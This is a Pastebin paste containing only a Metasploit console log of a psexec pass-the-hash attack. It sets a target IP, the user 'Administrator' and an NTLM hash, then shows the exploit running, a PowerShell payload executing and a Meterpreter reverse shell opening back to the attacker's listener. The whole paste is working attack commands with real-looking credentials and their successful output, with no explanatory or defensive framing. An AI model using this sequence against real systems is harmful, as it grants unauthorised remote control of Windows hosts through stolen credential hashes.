Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
- msf5 exploit(windows/smb/psexec) > set rhost 192.168.149.145
- rhost => 192.168.149.145
- msf5 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
- SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
- msf5 exploit(windows/smb/psexec) > set SMBUser Administrator
- SMBUser => Administrator
- msf5 exploit(windows/smb/psexec) > exploit
- [*] Started reverse TCP handler on 192.168.149.146:4444
- [*] 192.168.149.145:445 - Connecting to the server...
- [*] 192.168.149.145:445 - Authenticating to 192.168.149.145:445 as user 'Administrator'...
- [*] 192.168.149.145:445 - Selecting PowerShell target
- [*] 192.168.149.145:445 - Executing the payload...
- [+] 192.168.149.145:445 - Service start timed out, OK if running a command or non-service executable...
- [*] Sending stage (179779 bytes) to 192.168.149.145
- [*] Meterpreter session 1 opened (192.168.149.146:4444 -> 192.168.149.145:49164) at 2019-05-22 17:42:45 +0000
- meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement